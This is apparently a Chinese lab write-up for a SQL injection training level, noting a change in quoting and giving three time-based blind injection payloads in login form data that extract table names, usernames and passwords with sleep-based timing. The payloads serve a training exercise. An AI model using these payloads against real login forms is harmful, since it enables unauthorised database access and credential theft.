相较于第 15 关,单引号变成了双引号 + 括号
–查列
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查用户名
uname=admin") and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查密码
uname=admin") and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
也可以像第 8 关那样写一个脚本,因为只要掌握基本原理就可以写,这里就不再构造了…
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)